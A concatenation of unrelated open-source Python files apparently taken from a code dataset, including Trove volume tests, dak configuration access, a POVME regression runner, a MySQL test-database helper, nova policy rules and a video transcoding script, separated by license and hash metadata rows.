"{ rescnt=$2 } } { if($1 == \"Block count\") "
"{ blkcnt=$2 } } END { print (rescnt/blkcnt)*100 }'")
cmd = cmd % self.story.device_path
out, err = process(cmd)
self.assertEqual(float(5), round(float(out)), msg=out)
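# Editor's note (illustrative): the dumpe2fs/awk pipeline above computes the
# reserved-block percentage, i.e. "Reserved block count" / "Block count" * 100;
# mke2fs reserves 5% for root by default, hence the rounded comparison with 5.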
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[FormatVolume])
class MountVolume(VolumeTest):
@time_out(60)
def test_mount(self):
self.story.client._mount(self.story.device_path,
self.story.mount_point)
with open(self.story.test_mount_file_path, 'w') as file:
file.write("Yep, it's mounted alright.")
self.assertTrue(os.path.exists(self.story.test_mount_file_path))
def test_mount_options(self):
cmd = "mount -l | awk '/%s.*noatime/ { print $1 }'"
cmd %= LOCAL_MOUNT_PATH.replace('/', '')
out, err = process(cmd)
self.assertEqual(os.path.realpath(self.story.device_path), out.strip(),
msg=out)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[MountVolume])
class ResizeVolume(VolumeTest):
@time_out(300)
def test_resize(self):
self.story.api.resize(self.story.context, self.story.volume_id,
self.story.resize_volume_size)
volume = poll_until(lambda: self.story.get_volume(),
lambda volume: volume["status"] == "resized")
self.assertEqual(volume["status"], "resized")
self.assertTrue(volume["attach_status"], "attached")
self.assertTrue(volume['size'], self.story.resize_volume_size)
@time_out(300)
def test_resizefs_rescan(self):
self.story.client.resize_fs(self.story.context,
self.story.volume_id)
expected = "trove.tests.volume.driver.ISCSITestDriver"
        if FLAGS.volume_driver == expected:
size = self.story.resize_volume_size * \
test_driver.TESTS_VOLUME_SIZE_MULTIPLIER * 1024 * 1024
else:
size = self.story.resize_volume_size * 1024 * 1024
out, err = process('sudo blockdev --getsize64 %s' %
os.path.realpath(self.story.device_path))
if int(out) < (size * 0.8):
self.fail("Size %s is not more or less %s" % (out, size))
# Reset the volume status to available
self.story.api.update(self.story.context, self.story.volume_id,
{'status': 'available'})
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[MountVolume])
class UnmountVolume(VolumeTest):
@time_out(60)
def test_unmount(self):
self.story.client._unmount(self.story.mount_point)
child = pexpect.spawn("sudo mount %s" % self.story.mount_point)
child.expect("mount: can't find %s in" % self.story.mount_point)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[UnmountVolume])
class GrabUuid(VolumeTest):
@time_out(60)
def test_uuid_must_match_pattern(self):
"""UUID must be hex chars in the form 8-4-4-4-12."""
client = self.story.client # volume.Client()
device_path = self.story.device_path # '/dev/sda5'
uuid = client.get_uuid(device_path)
self.story.original_uuid = uuid
self.assertTrue(is_uuid(uuid), "uuid must match regex")
@time_out(60)
def test_get_invalid_uuid(self):
"""DevicePathInvalidForUuid is raised if device_path is wrong."""
client = self.story.client
device_path = "gdfjghsfjkhggrsyiyerreygghdsghsdfjhf"
self.assertRaises(trove_exception.DevicePathInvalidForUuid,
client.get_uuid, device_path)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[GrabUuid])
class RemoveVolume(VolumeTest):
@time_out(60)
def test_remove(self):
self.story.client.remove_volume(self.story.context,
self.story.volume_id,
self.story.host)
self.assertRaises(Exception,
self.story.client._format, self.story.device_path)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[GrabUuid])
class Initialize(VolumeTest):
@time_out(300)
def test_10_initialize_will_format(self):
"""initialize will setup, format, and store the UUID of a volume"""
self.assertTrue(self.story.get_volume()['uuid'] is None)
self.story.client.initialize(self.story.context, self.story.volume_id,
self.story.host)
volume = self.story.get_volume()
self.assertTrue(is_uuid(volume['uuid']), "uuid must match regex")
self.assertNotEqual(self.story.original_uuid, volume['uuid'],
"Validate our assumption that the volume UUID "
"will change when the volume is formatted.")
self.story.client.remove_volume(self.story.context,
self.story.volume_id,
self.story.host)
@time_out(60)
def test_20_initialize_the_second_time_will_not_format(self):
"""If initialize is called but a UUID exists, it should not format."""
old_uuid = self.story.get_volume()['uuid']
self.assertTrue(old_uuid is not None)
class VolumeClientNoFmt(volume.Client):
def _format(self, device_path):
raise RuntimeError("_format should not be called!")
no_fmt_client = VolumeClientNoFmt()
no_fmt_client.initialize(self.story.context, self.story.volume_id,
self.story.host)
self.assertEqual(old_uuid, self.story.get_volume()['uuid'],
"UUID should be the same as no formatting occurred.")
self.story.client.remove_volume(self.story.context,
self.story.volume_id,
self.story.host)
def test_30_check_device_exists(self):
assert_raises(exception.InvalidDevicePath, self.story.client._format,
self.story.device_path)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[Initialize])
class DeleteVolume(VolumeTest):
@time_out(60)
def test_delete(self):
self.story.api.delete(self.story.context, self.story.volume_id)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[DeleteVolume])
class ConfirmMissing(VolumeTest):
@time_out(60)
def test_discover_should_fail(self):
try:
self.story.client.driver.discover_volume(self.story.context,
self.story.volume)
self.fail("Expecting an error but did not get one.")
except exception.Error:
pass
except trove_exception.ISCSITargetNotDiscoverable:
pass
@time_out(60)
def test_get_missing_volume(self):
try:
volume = poll_until(lambda: self.story.api.get(self.story.context,
self.story.volume_id),
lambda volume: volume["status"] != "deleted")
self.assertEqual(volume["deleted"], False)
except exception.VolumeNotFound:
pass
| apache-2.0 | 7,793,867,989,542,511,000 | 37.416819 | 79 | 0.607452 | false |
haf/puppet-dak | daklib/config.py | 1 | 4474 | #!/usr/bin/env python
"""
Config access class
@contact: Debian FTPMaster <ftpmaster@debian.org>
@copyright: 2008 Mark Hymers <mhy@debian.org>
@license: GNU General Public License version 2 or later
"""
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
################################################################################
# <NCommander> mhy, how about "Now with 20% more monty python references"
################################################################################
import os
import apt_pkg
import socket
################################################################################
default_config = "/etc/dak/dak.conf" #: default dak config, defines host properties
# suppress some deprecation warnings in squeeze related to apt_pkg
# module
import warnings
warnings.filterwarnings('ignore', ".*apt_pkg.* is deprecated.*", DeprecationWarning)
################################################################################
def which_conf_file():
return os.getenv("DAK_CONFIG", default_config)
class Config(object):
"""
A Config object is a singleton containing
information about the DAK configuration
"""
__shared_state = {}
def __init__(self, *args, **kwargs):
self.__dict__ = self.__shared_state
if not getattr(self, 'initialised', False):
self.initialised = True
self._readconf()
self._setup_routines()
def _readconf(self):
apt_pkg.init()
self.Cnf = apt_pkg.Configuration()
apt_pkg.read_config_file_isc(self.Cnf, which_conf_file())
# Check whether our dak.conf was the real one or
# just a pointer to our main one
res = socket.gethostbyaddr(socket.gethostname())
conffile = self.Cnf.get("Config::" + res[0] + "::DakConfig")
if conffile:
apt_pkg.read_config_file_isc(self.Cnf, conffile)
# Rebind some functions
# TODO: Clean this up
self.get = self.Cnf.get
self.subtree = self.Cnf.subtree
self.value_list = self.Cnf.value_list
self.find = self.Cnf.find
self.find_b = self.Cnf.find_b
self.find_i = self.Cnf.find_i
def has_key(self, name):
return name in self.Cnf
def __contains__(self, name):
return name in self.Cnf
def __getitem__(self, name):
return self.Cnf[name]
def __setitem__(self, name, value):
self.Cnf[name] = value
@staticmethod
def get_db_value(name, default=None, rettype=None):
from daklib.dbconn import DBConfig, DBConn, NoResultFound
try:
res = DBConn().session().query(DBConfig).filter(DBConfig.name == name).one()
except NoResultFound:
return default
if rettype:
return rettype(res.value)
else:
return res.value
def _setup_routines(self):
"""
This routine is the canonical list of which fields need to exist in
        the config table. If your dak instance is to work, we suggest reading it.
        Of course, what the values do is another matter.
"""
for field in [('db_revision', None, int),
('defaultsuitename', 'unstable', str),
('exportpath', '', str)
]:
setattr(self, 'get_%s' % field[0], lambda s=None, x=field[0], y=field[1], z=field[2]: self.get_db_value(x, y, z))
setattr(Config, '%s' % field[0], property(fget=getattr(self, 'get_%s' % field[0])))
def get_defaultsuite(self):
from daklib.dbconn import get_suite
suitename = self.defaultsuitename
if not suitename:
return None
else:
return get_suite(suitename)
defaultsuite = property(get_defaultsuite)
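# Usage sketch (editor's illustration; the key names below are examples, not a
# guarantee of what a given dak.conf defines). Config uses shared state, so every
# instantiation sees the same parsed configuration:
#
#   from daklib.config import Config
#   cnf = Config()                       # honours DAK_CONFIG, else /etc/dak/dak.conf
#   root = cnf.get("Dir::Root", "")      # plain apt_pkg lookup with a default
#   if "Dinstall::Options" in cnf:
#       opts = cnf.subtree("Dinstall::Options")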
| gpl-2.0 | 216,816,975,558,764,000 | 31.897059 | 125 | 0.583371 | false |
POVME/POVME | POVME/tests/runRegTests.py | 1 | 6020 | import glob
import contextlib
import os
#import filecmp
import difflib
import re
import subprocess
import time
import argparse
import sys
@contextlib.contextmanager
def Chdir(directory):
cwd = os.getcwd()
os.chdir(directory)
yield
os.chdir(cwd)
rawRegTests = open('regTests').readlines()
# Ignore blank and commented-out lines
rawRegTests = [i for i in rawRegTests if i.strip() and not i.strip().startswith('#')]
regTests = []
results = {}
arunPath = os.getcwd()+'/../arun'
regexFileName = "file_comparison_ignore_regex"
regexes_to_ignore = [i.strip() for i in open(regexFileName).readlines()]
def remove_regex_lines(list_of_lines):
lines_to_remove = set([])
for i, line in enumerate(list_of_lines):
for regex in regexes_to_ignore:
if re.search(regex,line) != None:
lines_to_remove.add(i)
for i in sorted(list(lines_to_remove), reverse=True):
list_of_lines.pop(i)
return list_of_lines
def compareFile(origFile, args):
origFileData = open(origFile).readlines()
origFileData = remove_regex_lines(origFileData)
newFile = origFile.replace('.orig','')
if not os.path.exists(newFile):
print 'File %s does not exist - Unable to perform file comparison' %(newFile)
passed = False
return passed
newFileData = open(newFile).readlines()
newFileData = remove_regex_lines(newFileData)
#diff = difflib.compare(newFileData, origFileData)
#if difflib.ndiff(newFileData, origFileData)
#if filecmp.cmp(newFile, origFile) == True:
if newFileData == origFileData:
#passedFiles.append(origFile)
passed = True
print "Files %s and %s match!" %(newFile, origFile)
else:
#failedFiles.append(origFile)
passed = False
print 'File %s DOES NOT MATCH' %(origFile)
if args.compare == True:
validChoice = False
while validChoice == False:
choice = raw_input('Files %s and %s differ. View differences (y,n,v)? ' %(newFile, origFile))
if choice == 'y':
ignoreStr = ' '.join(['-I %s' %(i) for i in regexes_to_ignore])
os.system('diff %s %s %s | less' %(ignoreStr, newFile, origFile))
validChoice = True
elif choice == 'v':
os.system('tkdiff %s %s' %(newFile, origFile))
validChoice = True
elif choice == 'n':
validChoice = True
return passed
def runTests(args):
for line in rawRegTests:
linesp = line.split()
title = linesp[0]
results[title]={}
directory = os.getcwd()+'/'+linesp[1]+'/'
script = ' '.join(linesp[2:])
regTests.append([title, directory, script])
passedFiles = []
failedFiles = []
with Chdir(directory):
print
origFiles = glob.glob('*orig')
if args.remove_old == True:
files_to_remove = [i.replace('.orig','') for i in origFiles]
for file_to_remove in files_to_remove:
print 'Removing', file_to_remove
os.system('rm %s' %(file_to_remove))
print "RUNNING TEST %s" %(linesp)
runCommand = '%s python %s > output' %(arunPath, script)
print "Run command: %s" %(runCommand)
#os.system('%s python %s > output' %(arunPath,script))
#print '%s python %s/%s' %(arunPath, directory, script)
start = time.time()
p=subprocess.Popen(runCommand,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd = directory, shell=True)
out, error = p.communicate()
print 'Test ran in %s seconds' %(time.time()-start)
#print out, error
results[title]['testPassed'] = True
if p.returncode == 0:
print "Exit status: Completed"
results[title]['exit_status'] = True
else:
print "Exit status: Failed"
print 'error %s' %(error)
results[title]['exit_status'] = False
results[title]['testPassed'] = False
for origFile in origFiles:
passed = compareFile(origFile, args)
if passed == True:
passedFiles.append(origFile)
else:
failedFiles.append(origFile)
results[title]['testPassed'] = False
results[title]['passedFiles'] = passedFiles
results[title]['failedFiles'] = failedFiles
nPassed = 0
nFailed = 0
print
print '==============='
print "RESULTS SUMMARY"
print '==============='
for test in regTests:
print "----Test %s Exit Status = %s ----" %(test[0], results[test[0]]['exit_status'])
print "%i file comparisons succeeded: %s" %(len(results[test[0]]['passedFiles']),
results[test[0]]['passedFiles'])
print "%i file comparisons failed: %s" %(len(results[test[0]]['failedFiles']), results[test[0]]['failedFiles'])
if results[test[0]]['testPassed'] == True:
nPassed += 1
else:
nFailed += 1
print
print '%i tests passed, %i tests failed' %(nPassed, nFailed)
if nFailed > 0:
print "TEST SUITE FAILED"
sys.exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Run regression tests for this module")
parser.add_argument('-c', '--compare',
help='Offer comparison options if file fails diff',
action='store_true')
parser.add_argument('-r', '--remove_old',
help='Remove existing files with .orig complements before running',
action='store_true')
args = parser.parse_args()
runTests(args)
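# Example 'regTests' manifest (editor's illustration -- the entries are hypothetical).
# Each non-comment line is whitespace-separated: a test title, a directory relative
# to the current working directory, then the command handed to "<arun> python":
#
#   basic_run      examples/basic    POVME2.py basic.ini
#   #skipped_run   examples/other    POVME2.py other.ini
#
# Reference outputs are the '*.orig' files in each test directory; lines matching
# any regex in file_comparison_ignore_regex are dropped before comparison.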
| mit | -319,797,622,637,738,000 | 34.411765 | 119 | 0.547508 | false |
sssllliang/edx-analytics-pipeline | edx/analytics/tasks/tests/acceptance/services/db.py | 1 | 2440 |
import json
from contextlib import closing
from contextlib import contextmanager
import mysql.connector
from edx.analytics.tasks.url import get_target_from_url
# TODO: use a database that is unique to this particular test run to isolate it.
class DatabaseService(object):
def __init__(self, config, database_name):
self.credentials_file_url = config['credentials_file_url']
self.database_name = database_name
@property
def credentials(self):
if not hasattr(self, '_credentials'):
with get_target_from_url(self.credentials_file_url).open('r') as credentials_file:
self._credentials = json.load(credentials_file)
return self._credentials
@contextmanager
def cursor(self, explicit_db=True):
with self.connect(explicit_db=explicit_db) as conn:
with closing(conn.cursor()) as cur:
try:
yield cur
except:
conn.rollback()
raise
else:
conn.commit()
def execute_sql_file(self, file_path):
"""
Execute a file containing SQL statements.
Note that this *does not* use MySQL native mechanisms for parsing *.sql files. Instead it very naively parses
the statements out of the file itself.
"""
with self.cursor(explicit_db=True) as cur:
with open(file_path, 'r') as sql_file:
for _ignored in cur.execute(sql_file.read(), multi=True):
pass
def connect(self, explicit_db=True):
"""
Connect to the MySQL server.
Arguments:
connect(bool): Use a database for the connection. Set to false to create databases etc.
"""
kwargs = {
'host': self.credentials['host'],
'user': self.credentials['username'],
'password': self.credentials['password'],
}
if explicit_db:
kwargs['database'] = self.database_name
return closing(mysql.connector.connect(**kwargs))
def reset(self):
"""Create a testing database on the MySQL replacing any existing content with an empty database."""
with self.cursor(explicit_db=False) as cur:
cur.execute('DROP DATABASE IF EXISTS {0}'.format(self.database_name))
cur.execute('CREATE DATABASE {0}'.format(self.database_name))
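# Minimal usage sketch (editor's illustration; the URL and database name are made
# up). The credentials target is JSON with 'host', 'username' and 'password' keys,
# matching the `credentials` property above:
#
#   config = {'credentials_file_url': 's3://bucket/acceptance/creds.json'}
#   db = DatabaseService(config, 'analytics_acceptance_test')
#   db.reset()                                # drop and recreate the database
#   db.execute_sql_file('fixtures/schema.sql')
#   with db.cursor() as cur:
#       cur.execute('SELECT 1')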
| agpl-3.0 | -2,513,281,604,018,603,500 | 32.424658 | 117 | 0.602049 | false |
nickchen-mitac/fork | ava_settings.py | 1 | 1433 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
"""
Default settings which can be overridden by configuration files.
"""
GENERAL = {
"DEBUG": False,
}
WEBFRONT = {
"disabled": False,
"listen_port": 5080,
"listen_addr": "127.0.0.1",
"secure_listen_addr": "",
"secure_listen_port": 5443,
}
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"simple": {
"format": "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
}
},
"handlers": {
"console": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "simple"
},
"file_handler": {
"class": "logging.handlers.RotatingFileHandler",
"level": "INFO",
"formatter": "simple",
"filename": "${logs_dir}/ava.log",
"maxBytes": 1048576,
"backupCount": 2,
"encoding": "utf8"
}
},
"loggers": {
"ava": {
"level": "DEBUG",
"handlers": [
"console",
"file_handler"
],
"propagate": "no"
},
"avashell": {
"level": "DEBUG",
"handlers": [
"console",
"file_handler"
],
"propagate": "no"
},
"root": {
"level": "DEBUG",
"handlers": [
"console"
]
}
}
}
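# Editor's aside (illustrative; not necessarily how ava consumes these defaults):
# the "${logs_dir}" placeholder has to be substituted before the dict is handed to
# the stdlib logging machinery, e.g.
#
#   import copy, string, logging.config
#   cfg = copy.deepcopy(LOGGING)
#   handler = cfg['handlers']['file_handler']
#   handler['filename'] = string.Template(handler['filename']).substitute(
#       logs_dir='/var/log/ava')              # path is an assumption
#   logging.config.dictConfig(cfg)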
| apache-2.0 | -8,994,973,317,503,977,000 | 20.073529 | 82 | 0.467551 | false |
bkuczenski/lca-tools | antelope_reports/tables/base.py | 1 | 11488 | """
Functions for creating tables for useful / important comparisons. These are analogous to charts in that they
are forms of output and it's not clear where they belong.
Lists of tabular outputs:
* process or fragment Inventory
* compare process inventories
* compare allocations of a multioutput process
* compare LCIA factors for different methods
* compare an LCIA method with the components of one or more Lcia Results using it
Here's another thing: right now I'm using dynamic_grid to show these in the window, but it may be preferable to
use pandas instead -- pandas is good for working with data frames, though not necessarily for creating them.
Most likely, I could modify dynamic_grid to *return* a dataframe instead of drawing a table.
"""
from collections import defaultdict
from pandas import DataFrame
def printable(tup, width=8):
out = []
for k in tup:
if isinstance(k, str):
out.append(k)
elif k is None:
out.append('')
else:
try:
g = '%*.3g' % (width, k)
except TypeError:
g = '%*.*s' % (width, width, '----')
out.append(g)
return tuple(out)
class BaseTableOutput(object):
"""
A prototype class for storing and returning tabular information. This should ultimately be adopted in places
where dynamic_grids are used, or where TeX or excel tables are produced (like in lca_matrix foreground output
generators) but for now it is just being used to provide some separation of concerns for the flowables super-grid.
At the heart is a dict whose key is a 2-tuple of (row signifier, column index). The row signifier can be any
hashable object, but the column indices are always sequential. re-ordering columns is something we do not feel
particularly like enabling at the present time.
The user creates the table with initialization parameters as desired, and then builds out the table by adding
columns in sequence.
The table has an inclusion criterion for the iterables (which could be None)-- if the criterion is met, the object
is added; if not, it is skipped. The criterion can change, but (since the table contents are static) this will not
result in columns being re-iterated.
Subclasses MAY redefine:
_returns_sets: determines whether each grid item is singly or multiply valued
Subclasses MUST implement:
_near_headings -- column names for left-side headings
_generate_items(col) -- argument is a column iterable - generates items
_pull_row_from_item(item) -- argument is one of the objects returned by the column iteration, returns row key
_extract_data_from_item -- argument is an dict from the grid dict, returns either a dict or an immutable object
"""
_near_headings = '', # should be overridden
_far_headings = '', # should be overridden
_returns_sets = False
def _pull_row_from_item(self, item):
"""
Returns the row tuple from an item, for insertion into the rows set. meant to be overridden
:param item:
:return: always a tuple. default item,
"""
row = item
# if not self._returns_sets:
return row,
def _pull_note_from_item(self, item):
"""
Returns the "long" / descriptive text appended to the right-hand side of the table. should return a str.
Only used if _returns_sets is false (otherwise, the sets indicate the row + subrow labels)
This is may turn out to be totally silly / pointless.
:param item:
:return:
"""
return ''
def _generate_items(self, iterable):
"""
yields the items from a column entry. Meant to be overridden.
:param iterable:
:return:
"""
for item in iterable:
if self._criterion(item):
yield item
def _extract_data_from_item(self, item):
"""
note: dict item is a list of components
Determines how to get the data point from the item/list. Meant to be overridden.
If self._returns_sets is true, should return a dict. Else should return an immutable.
:param item:
        :return: the extracted data value (a dict when _returns_sets is True, otherwise an immutable)
"""
return item
def _header_row(self):
"""
Returns a tuple of columns for the header row
:return:
"""
header = self._near_headings
for i, _ in enumerate(self._columns):
header += ('C%d' % i),
header += self._far_headings # placeholder for row notes / subitem keys
return header
def _build_near_header(self, row, prev):
the_row = []
for i, _ in enumerate(self._near_headings):
if prev is not None:
if prev[i] == row[i]:
the_row.append('""')
continue
the_row.append('%s' % row[i])
return the_row
def _build_row(self, row, prev=None):
"""
Returns a single row as a tuple.
:param row:
:param prev: [None] previous row printed (input, not output). Used to suppress header output for repeat entries.
:return:
"""
# first build the near header
the_row = self._build_near_header(row, prev)
data_keys = set()
data_vals = []
# first pass: get all the data / keys
for i, _ in enumerate(self._columns):
data = self._extract_data_from_item(self._d[row, i])
if isinstance(data, dict):
if not self._returns_sets:
raise TypeError('multiple values returned but subclass does not allow them!')
for k in data.keys():
data_keys.add(k)
data_vals.append(data)
# second pass: build the sub-table by rows
if self._returns_sets:
the_rows = []
_ftt = True # first time through
keys = tuple(sorted(data_keys, key=lambda x: x[-2]))
for k in keys:
if not _ftt:
the_row = ['' for i in range(len(self._near_headings))]
for i, _ in enumerate(self._columns):
if k in data_vals[i]:
the_row.append(data_vals[i][k])
else:
the_row.append(None)
the_row.append(k)
if _ftt:
the_row.append(self._notes[row])
else:
the_row.append('')
the_rows.append(the_row)
_ftt = False
return the_rows
else:
the_row.extend(data_vals)
# add notes
the_row.append(self._notes[row])
return the_row
def __init__(self, *args, criterion=None):
"""
Provide 0 or more positional arguments as data columns; add data columns later with add_column(arg)
:param args: sequential data columns
:param criterion: A callable expression that returns true if a given
"""
self._d = defaultdict(list)
if callable(criterion):
self._criterion = criterion
else:
if criterion is not None:
print('Ignoring non-callable criterion')
self._criterion = lambda x: True
self._rows = set() # set of valid keys to dict
self._notes = dict()
self._columns = [] # list of columns in the order added
# a valid reference consists of (x, y) where x in self._rows and y < len(self._columns)
for arg in args:
self.add_column(arg)
def _add_rowitem(self, col_idx, item, row=None):
if row is None:
row = self._pull_row_from_item(item)
self._rows.add(row)
if row not in self._notes:
self._notes[row] = self._pull_note_from_item(item)
self._d[row, col_idx].append(item)
def add_column(self, arg):
col_idx = len(self._columns)
for k in self._generate_items(arg):
self._add_rowitem(col_idx, k)
self._columns.append(arg)
def _sorted_rows(self):
for row in sorted(self._rows, key=lambda x: tuple([str(k) for k in x])):
yield row
def text(self, width=10, hdr_width=24, max_width=112, expanded=True):
"""
Outputs the table in text format
:return: nothing.
"""
header = self._header_row()
prev = None
body = []
width = max(6, width)
wds = [len(header[i]) for i in range(len(self._near_headings))]
# determine column widths
for row in self._sorted_rows():
prt_row = self._build_row(row, prev=prev)
if self._returns_sets:
wds = [min(max(wds[i], len('%s' % prt_row[0][i])), hdr_width) for i in range(len(self._near_headings))]
else:
wds = [min(max(wds[i], len('%s' % prt_row[i])), hdr_width) for i in range(len(self._near_headings))]
body.append(prt_row)
prev = row
# build display string
rem_width = max_width
fmt = ''
for i in wds:
rem_width -= i
fmt += '%%-%d.%ds ' % (i, i)
rem_width -= 1
for i in range(len(self._columns)):
rem_width -= width
fmt += '%%-%d.%ds ' % (width, width)
rem_width -= 1
if rem_width < 0:
# uh oh negative rem width: widen freely; set remainder to 10 chars
max_width -= (rem_width - 10)
rem_width = 10
fmt += '%%-%d.%ds' % (rem_width, rem_width)
if self._returns_sets:
fmt += ' %s'
print(fmt % header)
print('-' * max_width)
for row in body:
if self._returns_sets:
for subrow in row: # sorted(row, key=lambda x: x[-2])
print(fmt % printable(subrow, width=width))
else:
print(fmt % printable(row, width=width))
print(fmt % header)
print('\nColumns:')
for i, c in enumerate(self._columns):
print('C%d: %s' % (i, c))
def dataframe(self):
df = DataFrame(columns=self._header_row())
prev = None
for row in self._sorted_rows():
if self._returns_sets:
for r in self._build_row(row):
d = dict(zip(self._header_row(), printable(r)))
df = df.append(d, ignore_index=True)
else:
d = dict(zip(self._header_row(), printable(self._build_row(row, prev=prev))))
df = df.append(d, ignore_index=True)
prev = row
return df
def to_excel(self, xl_writer, sheetname, width_scaling=0.75):
"""
Must supply a pandas XlsxWriter. This routine does not save the document.
:param xl_writer:
:param sheetname:
:param width_scaling:
:return:
"""
df = self.dataframe()
df.to_excel(xl_writer, sheet_name=sheetname)
sht = xl_writer.sheets[sheetname]
for k in self._near_headings + self._far_headings:
ix = df.columns.tolist().index(k) + 1
mx = max([7, width_scaling * df[k].astype(str).str.len().max()])
sht.set_column(ix, ix, width=mx)
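# Editor's sketch (not part of the original module): a minimal concrete subclass
# wiring up the hooks the BaseTableOutput docstring requires. It assumes each
# column is a plain dict mapping a row name to a numeric value; cell contents are
# summed because the grid stores a list of components per cell.
class SimpleDictTable(BaseTableOutput):
    _near_headings = 'Name',
    _far_headings = 'Note',

    def _generate_items(self, iterable):
        # items are (name, value) pairs drawn from the dict column
        for item in iterable.items():
            if self._criterion(item):
                yield item

    def _pull_row_from_item(self, item):
        return item[0],

    def _extract_data_from_item(self, item):
        # item is the list of (name, value) pairs accumulated for this cell
        return sum(value for _, value in item)

# e.g. SimpleDictTable({'a': 1.0, 'b': 2.5}, {'a': 3.0}).text() prints a two-row,
# two-column table; cells where a column lacks the row come out as 0 because the
# empty component list sums to zero.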
| gpl-2.0 | -5,190,139,048,839,691,000 | 34.9 | 120 | 0.566591 | false |
samhutchins/tools | video_production/transcode-for-edit.py | 1 | 1479 | #!/usr/bin/env python3.6
import os, argparse, subprocess
def main():
parser = argparse.ArgumentParser()
parser.add_argument("project")
args = parser.parse_args()
home = os.path.join(os.path.expanduser("~"), "Videos", "Mine", "WIP")
dest_dir = os.path.join(home, args.project, "footage")
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
videos = []
for root, _, files in os.walk(os.getcwd()):
for file in files:
videos.append(os.path.join(root, file))
videos = [x for x in videos if x[-4:].lower() == ".mov" or x[-4:].lower() == ".mp4"]
for video in videos:
transcode(video, dest_dir)
def transcode(video, dest_dir):
size = subprocess.check_output('ffprobe -v quiet -print_format csv=p=0 -select_streams v:0 -show_entries stream=height,width "' + video + '"').decode('utf-8').rstrip()
width = int(size.split(",")[0])
args = ""
if 1920 < width:
args = " -vf scale=1920:-1"
destination = get_filename(video, dest_dir)
command = 'ffmpeg -hide_banner -v error -stats -y -i "' + video + '" -vcodec prores -profile:v 3' + args + " " + destination
print("Transcoding " + os.path.basename(video))
subprocess.run(command)
def get_filename(file, dest_dir):
basename = os.path.basename(file)
filename = os.path.splitext(basename)[0]
return '"' + os.path.join(dest_dir, filename + ".mov") + '"'
if __name__ == "__main__":
    main()
| mit | -8,815,710,785,763,945,000 | 31.173913 | 171 | 0.601082 | false |
vmturbo/nova | nova/policies/volumes_attachments.py | 1 | 2496 | # Copyright 2016 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_policy import policy
from nova.policies import base
POLICY_ROOT = 'os_compute_api:os-volumes-attachments:%s'
volumes_attachments_policies = [
base.create_rule_default(
POLICY_ROOT % 'index',
base.RULE_ADMIN_OR_OWNER,
"List volume attachments for an instance",
[
{'method': 'GET',
'path': '/servers/{server_id}/os-volume_attachments'
}
]),
base.create_rule_default(
POLICY_ROOT % 'create',
base.RULE_ADMIN_OR_OWNER,
"Attach a volume to an instance",
[
{
'method': 'POST',
'path': '/servers/{server_id}/os-volume_attachments'
}
]),
base.create_rule_default(
POLICY_ROOT % 'show',
base.RULE_ADMIN_OR_OWNER,
"Show details of a volume attachment",
[
{
'method': 'GET',
'path':
'/servers/{server_id}/os-volume_attachments/{attachment_id}'
}
]),
policy.RuleDefault(
name=POLICY_ROOT % 'discoverable',
check_str=base.RULE_ANY),
base.create_rule_default(
POLICY_ROOT % 'update',
base.RULE_ADMIN_API,
"Update a volume attachment",
[
{
'method': 'PUT',
'path':
'/servers/{server_id}/os-volume_attachments/{attachment_id}'
}
]),
base.create_rule_default(
POLICY_ROOT % 'delete',
base.RULE_ADMIN_OR_OWNER,
"Detach a volume from an instance",
[
{
'method': 'DELETE',
'path':
'/servers/{server_id}/os-volume_attachments/{attachment_id}'
}
]),
]
def list_rules():
return volumes_attachments_policies
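# Editor's aside (illustrative): nova aggregates these entries through list_rules()
# when building its sample policy file, so the rendered output would contain
# entries such as
#   "os_compute_api:os-volumes-attachments:index": "rule:admin_or_owner"
# with the check string supplied by base.RULE_ADMIN_OR_OWNER.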
| apache-2.0 | 6,217,302,918,994,485,000 | 28.714286 | 78 | 0.555288 | false |
RhubarbSin/arin-reg-rws | regrws/payload/org.py | 1 | 73155 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Tue Aug 6 14:52:51 2013 by generateDS.py version 2.10a.
#
# Copyright (C) 2011,2012,2013 American Registry for Internet Numbers
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR
# IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import sys
import getopt
import re as re_
import base64
import datetime as datetime_
etree_ = None
